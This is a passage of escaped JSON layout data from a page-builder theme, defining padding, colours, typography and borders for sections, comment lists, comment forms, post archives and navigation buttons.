":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}}}}},{\"id\":94,\"type\":\"hop-section\",\"nodeId\":\"16-m55\",\"nodes\":[\"432-m29\"],\"style\":{\"padding\":{\"top\":{\"value\":0},\"bottom\":{\"value\":0}}},\"v\":\"1.1\"},{\"id\":95,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"16-m59\",\"nodes\":[\"432-m34\"],\"v\":\"1.1\"},{\"id\":96,\"type\":\"hop-column\",\"nodeId\":\"16-m60\",\"nodes\":[\"432-m35\"],\"v\":\"1.1\"},{\"id\":97,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"nodeId\":\"16-m61\",\"nodes\":[\"432-m36\"],\"v\":\"1.1\"},{\"id\":98,\"type\":\"hop-text\",\"nodeId\":\"16-m62\",\"nodes\":[\"432-m37\"],\"v\":\"1.1\"},{\"id\":99,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"horizontalGap\":0,\"verticalGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}}}},\"type\":\"hop-row\",\"nodeId\":\"16-m56\",\"nodes\":[\"432-m30\"],\"v\":\"1.1\"},{\"id\":100,\"type\":\"hop-column\",\"nodeId\":\"16-m57\",\"nodes\":[\"432-m31\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"0\"},\"bottom\":{\"unit\":\"px\",\"value\":\"15\"}},\"textAlign\":\"left\",\"media\":{\"tablet\":{\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"mobile\":{\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":3}}},{\"id\":101,\"type\":\"hop-post-comments\",\"nodeId\":\"1723-m26\",\"v\":\"1.1\",\"nodes\":[\"432-m32\"],\"style\":{\"descendants\":{\"commentsTitle\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5}\",\"weight\":\"600\",\"family\":\"Open Sans\",\"size\":{\"unit\":\"em\",\"value\":\"1.25\"}}},\"commentInfo\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant1}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}},\"background\":{\"color\":\"\"},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"transition\":{\"duration\":{\"value\":\"0.5\"}}},\"commentText\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant2}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"holders\":{\"p\":{\"color\":\"${theme.colors.5|variant2}\"},\"a\":{\"states\":{\"hover\":{\"color\":\"${theme.colors.0|variant3}\"}}}}}},\"commentAuthorName\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"decoration\":\"none\",\"style\":\"normal\",\"weight\":\"600\"},\"background\":{\"color\":\"\"},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"5\",\"unit\":\"px\"}}},\"disabledComments\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant2}\"}},\"comment\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"padding\":{\"top\":{\"value\":\"12\",\"unit\":\"px\"},\"right\":{\"value\":\"12\",\"unit\":\"px\"},\"bottom\":{\"value\":\"12\",\"unit\":\"px\"},\"left\":{\"value\":\"12\",\"unit\":\"px\"}}},\"commentAvatar\":{\"width\":{\"value\":30},\"height\":{\"value\":30},\"background\":{\"color\":\"\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"commentsContainer\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"}},\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"commentReply\":{\"typography\":{\"color\":\"${theme.colors.0}\",\"size\":{\"unit\":\"em\",\"value\":\"1\"},\"transform\":\"lowercase\",\"weight\":\"400\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.5\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"alternateComment\":{\"background\":{\"color\":\"rgba(166, 220, 244, 0.1)\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"padding\":{\"top\":{\"value\":\"12\",\"unit\":\"px\"},\"right\":{\"value\":\"12\",\"unit\":\"px\"},\"bottom\":{\"value\":\"12\",\"unit\":\"px\"},\"left\":{\"value\":\"12\",\"unit\":\"px\"}}},\"commentReplies\":{\"margin\":{\"left\":{\"value\":\"12\"}}},\"commentInfoContainer\":{\"typography\":{\"color\":\"${theme.colors.4|variant2}\"},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"16\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}}}},{\"id\":102,\"type\":\"hop-post-comment-form\",\"nodeId\":\"23-m32\",\"v\":\"1.1\",\"nodes\":[\"432-m33\"],\"style\":{\"descendants\":{\"commentFormTitle\":{\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"em\",\"value\":\"1.25\"},\"weight\":\"600\",\"family\":\"Open Sans\"}},\"commentFormLabels\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}}}},\"commentFormButton\":{\"background\":{\"color\":\"${theme.colors.0}\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0|variant3}\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\",\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\",\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"}},\"padding\":{\"top\":{\"value\":\"12\",\"unit\":\"px\"},\"right\":{\"value\":\"24\",\"unit\":\"px\"},\"bottom\":{\"value\":\"12\",\"unit\":\"px\"},\"left\":{\"value\":\"24\",\"unit\":\"px\"}},\"typography\":{\"color\":\"${theme.colors.4}\",\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"weight\":\"600\",\"family\":\"Open Sans\",\"transform\":\"uppercase\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"1\"}}},\"commentFormInputs\":{\"border\":{\"top\":{\"color\":\"rgb(238, 238, 238)\",\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"right\":{\"color\":\"rgb(238, 238, 238)\"},\"left\":{\"color\":\"rgb(238, 238, 238)\"},\"bottom\":{\"color\":\"rgb(238, 238, 238)\",\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"typography\":{\"weight\":\"400\",\"family\":\"Open Sans\",\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"color\":\"${theme.colors.5|variant2}\"},\"background\":{\"color\":\"rgba(0,0,0,0)\"},\"padding\":{\"top\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"value\":\"5\",\"unit\":\"px\"}}},\"commentFormNotes\":{\"typography\":{\"color\":\"${theme.colors.5|variant1}\",\"weight\":\"400\",\"family\":\"Open Sans\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}},\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}},\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"}},\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},{\"id\":103,\"type\":\"hop-main\",\"nodeId\":\"68-m1\",\"v\":\"1.1\",\"nodes\":[\"435-m1\"],\"style\":{\"margin\":{\"top\":{\"value\":\"-30\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"-15\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}}}},{\"id\":104,\"type\":\"hop-section\",\"nodeId\":\"19-m36\",\"nodes\":[\"435-m2\"],\"style\":{\"padding\":{\"top\":{\"value\":\"0\"},\"bottom\":{\"value\":\"0\"}}},\"v\":\"1.1\"},{\"id\":105,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"19-m40\",\"nodes\":[\"435-m25\"],\"v\":\"1.1\"},{\"id\":106,\"type\":\"hop-column\",\"nodeId\":\"19-m41\",\"nodes\":[\"435-m26\"],\"v\":\"1.1\"},{\"id\":107,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"nodeId\":\"19-m42\",\"nodes\":[\"435-m27\"],\"v\":\"1.1\"},{\"id\":108,\"type\":\"hop-text\",\"nodeId\":\"19-m43\",\"nodes\":[\"435-m28\"],\"v\":\"1.1\"},{\"id\":109,\"type\":\"hop-archive-loop\",\"nodeId\":\"26-m6\",\"props\":{\"layout\":{\"horizontalGap\":3,\"verticalGap\":3,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"itemsPerRow\":2,\"horizontalAlign\":\"start\",\"custom\":{\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}}},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":1,\"horizontalGap\":2,\"verticalGap\":2}},\"mobile\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"horizontalGap\":2}}},\"showMasonry\":true},\"v\":\"1.1\",\"nodes\":[\"435-m3\"]},{\"id\":110,\"type\":\"hop-loop-item\",\"nodeId\":\"26-m7\",\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(1, 51, 74, 0.15)\",\"spread\":\"0\",\"y\":\"10\",\"blur\":\"40\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"435-m4\"],\"props\":{\"attrs\":{\"overflowOption\":\"hidden\"}}},{\"id\":111,\"type\":\"hop-post-thumbnail\",\"nodeId\":\"26-m19\",\"style\":{\"margin\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\"}},\"background\":{\"color\":\"rgba(255,255,255,0)\"}},\"v\":\"1.1\",\"nodes\":[\"435-m5\"]},{\"id\":112,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":3,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}}},\"media\":{\"tablet\":{\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":3,\"horizontalGap\":3,\"verticalGap\":0,\"custom\":{\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}}}},\"mobile\":{\"layout\":{\"horizontalGap\":3,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}}}}}},\"type\":\"hop-row\",\"nodeId\":\"1726-m24\",\"v\":\"1.1\",\"nodes\":[\"435-m6\"],\"style\":{\"margin\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\"}}}},{\"id\":113,\"type\":\"hop-column\",\"nodeId\":\"1726-m25\",\"style\":{\"textAlign\":\"left\",\"border\":{\"top\":{\"style\":\"solid\",\"color\":\"rgb(238, 238, 238)\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"solid\",\"color\":\"rgb(238, 238, 238)\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"solid\",\"color\":\"rgb(238, 238, 238)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"style\":\"solid\",\"color\":\"rgb(238, 238, 238)\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}},\"textAlign\":\"center\"}},\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"v\":\"1.1\",\"nodes\":[\"435-m7\"],\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":3,\"vSpace\":{\"value\":\"10\"}},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":3}}}}},{\"id\":114,\"type\":\"hop-post-meta\",\"nodeId\":\"1706-c23\",\"style\":{\"descendants\":{\"icons\":{\"display\":\"none\",\"height\":{\"value\":\"18\"},\"width\":{\"value\":\"18\"},\"margin\":{\"right\":{\"value\":\"5\"}}},\"metaDataLinks\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant1}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(0, 0, 0)\"}}}},\"metaDataPrefix\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}}},\"metaDataSuffix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"color\":\"${theme.colors.5|variant2}\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"435-m8\"]},{\"id\":115,\"type\":\"hop-post-meta\",\"nodeId\":\"19-m9\",\"style\":{\"descendants\":{\"icons\":{\"display\":\"none\",\"height\":{\"value\":\"18\"},\"width\":{\"value\":\"18\"},\"margin\":{\"right\":{\"value\":\"5\"}}},\"metaDataLinks\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant1}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(0, 0, 0)\"}}}},\"metaDataPrefix\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}}},\"metaDataSuffix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"color\":\"${theme.colors.5|variant2}\"}}}},\"v\":\"1.1\",\"nodes\":[\"435-m9\"]},{\"id\":116,\"type\":\"hop-post-title\",\"nodeId\":\"26-m10\",\"style\":{\"descendants\":{\"title\":{\"transition\":{\"duration\":{\"value\":\"0.5\"}}}}},\"v\":\"1.1\",\"nodes\":[\"435-m10\"]},{\"id\":117,\"type\":\"hop-post-excerpt\",\"nodeId\":\"26-m11\",\"style\":{\"descendants\":{\"excerpt\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}}},\"v\":\"1.1\",\"nodes\":[\"435-m11\"]},{\"id\":118,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"equalHeight\":true,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}}},\"media\":{\"mobile\":{\"layout\":{\"itemsPerRow\":2,\"horizontalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"verticalGap\":0}}}},\"type\":\"hop-row\",\"nodeId\":\"1706-c20\",\"v\":\"1.1\",\"nodes\":[\"435-m12\"]},{\"id\":119,\"type\":\"hop-column\",\"nodeId\":\"1726-m20\",\"style\":{\"textAlign\":\"left\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}},\"props\":{\"verticalAlign\":\"center\",\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":2,\"vSpace\":{\"value\":\"10\"}},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":3}}}},\"v\":\"1.1\",\"nodes\":[\"435-m13\"]},{\"id\":120,\"type\":\"hop-post-meta\",\"nodeId\":\"19-m25\",\"nodes\":[\"435-m14\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"metaDataLinks\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}}},\"typography\":{\"color\":\"${theme.colors.0}\",\"decoration\":\"none\"}},\"icons\":{\"display\":\"inline-block\",\"height\":{\"value\":\"24\"},\"width\":{\"value\":\"24\"},\"margin\":{\"right\":{\"value\":\"5\"}}}}}},{\"id\":121,\"type\":\"hop-column\",\"nodeId\":\"1726-m21\",\"style\":{\"textAlign\":\"right\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}},\"props\":{\"verticalAlign\":\"center\",\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":2,\"vSpace\":{\"value\":\"10\"}},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":3}}}},\"v\":\"1.1\",\"nodes\":[\"435-m15\"]},{\"id\":122,\"type\":\"hop-post-read-more-group\",\"nodeId\":\"19-m32\",\"nodes\":[\"435-m16\"],\"v\":\"1.1\"},{\"id\":123,\"type\":\"hop-post-read-more\",\"nodeId\":\"19-m33\",\"nodes\":[\"435-m17\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"center\",\"typography\":{\"color\":\"${theme.colors.0}\",\"family\":\"Open Sans\",\"margin\":{\"top\":\"\",\"bottom\":\"2rem\"},\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"weight\":\"400\",\"lineHeight\":{\"value\":\"1.6\",\"unit\":\"\"},\"letterSpacing\":{\"value\":\"\",\"unit\":\"px\"}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"margin\":{\"left\":{\"value\":\"5\",\"unit\":\"px\",\"path\":\"value\"},\"right\":{\"value\":0,\"unit\":\"px\"}}}}},\"props\":{\"showIcon\":true,\"iconPosition\":\"after\"}},{\"id\":124,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"horizontalAlign\":\"end\"},\"media\":{\"mobile\":{\"layout\":{\"horizontalAlign\":\"center\"}}}},\"type\":\"hop-post-nav-container\",\"nodeId\":\"19-m36\",\"nodes\":[\"435-m18\"],\"v\":\"1.1\",\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"}},\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"30\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"30\",\"unit\":\"px\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"10\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"10\",\"unit\":\"px\"}}}}}},{\"id\":125,\"type\":\"hop-column\",\"nodeId\":\"19-m37\",\"nodes\":[\"435-m19\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"15\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":126,\"type\":\"hop-archive-nav-button\",\"nodeId\":\"26-m20\",\"v\":\"1.1\",\"nodes\":[\"435-m20\"],\"style\":{\"descendants\":{\"paginationNavigationButton\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant3}\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":0},\"right\":{\"value\":0}}},\"bottom\":{\"radius\":{\"left\":{\"value\":0},\"right\":{\"value\":0}}}}}}}},{\"id\":127,\"type\":\"hop-column\",\"nodeId\":\"19-m39\",\"nodes\":[\"435-m21\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"v